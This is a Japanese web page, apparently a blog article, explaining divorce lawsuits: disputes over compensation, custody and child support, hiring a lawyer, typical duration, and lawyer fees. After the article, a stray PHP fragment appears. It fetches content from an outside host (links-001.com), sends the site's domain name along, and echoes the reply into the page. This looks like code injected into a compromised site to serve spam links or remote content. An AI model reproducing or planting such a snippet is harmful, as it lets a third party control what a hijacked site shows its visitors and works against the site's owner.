前へ
次へ

離婚裁判のときにはどうするのか

愛し合うことを誓った上で結婚しているということになるわけでいろいろなものが違ったりとかがすれ違ったということによって、最終的に離婚という結論に達することもあるでしょう。離婚自体は悪いことではないです。決して良い事でもないですが二人が納得している上でお互いにまた別の道を歩むようにしようとかそういう話し合いができたのであれば、問題なく離婚できることでしょう。しかしながらやはり揉めるということもあります。特にいえるのがどちらかに非がある場合です。そんな時にはまず話し合いをしてある程度慰謝料とかそういうものを請求した上で離婚ということになるわけですがされる側としてはもう離婚するわけですから相手の言いなりに払うというようなことを拒否することもあります。また、非あるからと言って一方的に尋常ではないレベルの慰謝料を請求されるということもあるわけで常に話し合いで結果が出るというわけではないです。そんな時にどうするのかということですが離婚裁判ということになります。つまりは、離婚をするのに裁判沙汰になる、ということです。これ自体はそこまで珍しいことではないのですがとにかくお互いの主張がぶつかり合うということが多いのできちんとを弁護士を雇ってお願いするということになります。離婚裁判ですがどのくらいの時間がかかるのかということになりますが基本的に半年とか3ヶ月とかそのぐらいはかかるというのを意識しておいた方がいいです。意外とすんなりと話が進むということもありますが、もめる時はとことん揉めるということが多いので難しいことも多いです。特に親権などに関しては揉めることが多いですし、その上でどのくらいの養育費を、ということでも揉めことでしょう。こういうことをお願いする弁護士に支払う費用というのは成功報酬という部分もありますし、着手金というのも支払うことになります。総額で考えるようにしたほうがよいといえるでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top